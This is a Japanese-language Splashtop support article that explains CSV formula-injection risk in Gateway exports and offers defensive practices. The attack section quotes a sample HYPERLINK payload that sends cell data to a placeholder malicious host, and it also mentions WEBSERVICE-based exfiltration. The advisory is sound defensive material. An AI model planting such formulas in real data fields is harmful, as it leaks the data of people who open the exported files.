1. Splashtop On-Prem - サポートセンター
  2. セキュリティ
  3. 一般

CSV エクスポートの脆弱性と安全な取り扱いのガイドライン

Avatar
Splashtop

概要

この記事は、数式を解釈するサードパーティ製ソフトウエアで CSV エクスポートを開く際の,潜在的なセキュリティリスクについての 認識を高める ことを目的としています。その目的は、CSVファイルを安全に取り扱うためのベストプラクティスをユーザーに提供することです。Splashtop Gatewayは、データ処理機能なし」で生の CSV ファイルをエクスポートします。リスクは、数式を自動的に実行するアプリケーションでこれらのファイルを開いた場合にのみ発生します。

ユーザーがテキストフィールド内に数式 (グループ名など) を埋め込む可能性があるというセキュリティ上のリスクが存在します。別のユーザーが CSV をエクスポートし、数式を処理するスプレッドシートソフトウエア (Microsoft Excel など) で開くと、数式が実行され、閲覧者に誤解を与えたり、データが漏洩したりする可能性があります。

攻撃の仕組み

  1. ユーザーは、次の数式のような文字列をグループ名として入力します。 
    =HYPERLINK("http://malicious-site[.]com/collect?data="&A24, "Click here")
  2. 別のユーザーが、この数式のような文字列を含む CSV をエクスポートします。
  3. エクスポートされたファイルを数式を解釈するソフトウエアで開くと、生のテキストを表示する代わりに数式が処理されます。
  4. 表示されたハイパーリンクをクリックすると、データ(A24セルのコンテンツなど)が外部サーバーに送信される可能性があります。

この攻撃は、グループCSVエクスポートに限定されずユーザー生成コンテンツを含むすべてのCSVエクスポートに影響を与える可能性があります。

Splashtop CSVエクスポートが安全な理由

  • CSVはプレーンテキスト形式です。
    数式を実行したり、データを処理したり、アクションをトリガーしたりすることはありません。
  • 私たちのシステムは生のCSVデータをエクスポートします。
    –エクスポートされたファイル内で隠れた処理、実行、または変換は行われません。
  • セキュリティリスクは、生のテキストを表示する代わりに 数式を自動的に処理 するサードパーティソフトウエアでCSVファイルを開く場合にのみ発生します。

したがって、 セキュリティリスクは、CSVファイル自体ではなく、CSVを開くために使用されるアプリケーションによって発生します。ユーザーは、Microsoft Excel や Google Sheets などのソフトウエアで CSV ファイルを開くときに、これらのリスクに注意する必要があります。

その他の潜在的な攻撃

  • WEBSERVICE 数式 (Windows 環境) – ファイルを開いたときにデータをサイレントに送信するために使用できます。
  • 計算式 (例:= A1 + B2)–表示される値を変更し、閲覧者に誤解を与える可能性があります。
  • その他の埋め込み数式 – 特定のスプレッドシートプログラムで開いたときに、意図しない動作が発生する可能性があります。

攻撃から守る方法

1.CSVファイルを安全に開きます。

  • Excelの代わりに、テキストエディター(メモ帳など)または専用のCSVビューアを使用してください。
  • CSVファイルを開くときに、スプレッドシートアプリケーションでの自動式実行を無効にします。
  • CSVファイル内の予期しないリンクや見慣れないデータをクリックしないでください。

2. 組織のベストプラクティス

  • 悪意のあるCSVコンテンツのリスクについて、従業員とユーザーを教育します。
  • CSVエクスポート履歴を監視して確認し、疑わしい入力パターンを確認します。
  • Office アプリケーションのセキュリティ機能を有効にし、CSV ファイルの処理に関する組織全体のベストプラクティスを適用します。

免責事項

Splashtop Gateway は、未処理のテキストベースの生データを生成する CSV エクスポート機能を提供します。CSV はプレーンテキストファイル形式であり、実行可能コードが含まれておらず、処理も実行されません。リスクが発生するのは、数式を自動的に解釈するソフトウエアでCSVファイルを開くときだけです。

  • セキュリティ上の懸念は、当社の製品ではなく、サードパーティアプリケーションがCSVファイルを処理する方法によって引き起こされます。
  • エクスポートしたCSVファイルは、数式を自動的に実行しないソフトウエアで開くことをおすすめします。
  • ユーザーは、エクスポートされたファイルを自分の環境でどのように処理するかに責任を持つ必要があります。

これらの予防措置に従うことで、ユーザーはCSVベースの攻撃のリスクを最小限に抑え、エクスポートを処理する際のデータの整合性を確保できます。

0人中0人がこの記事が役に立ったと言っています

このセクションの記事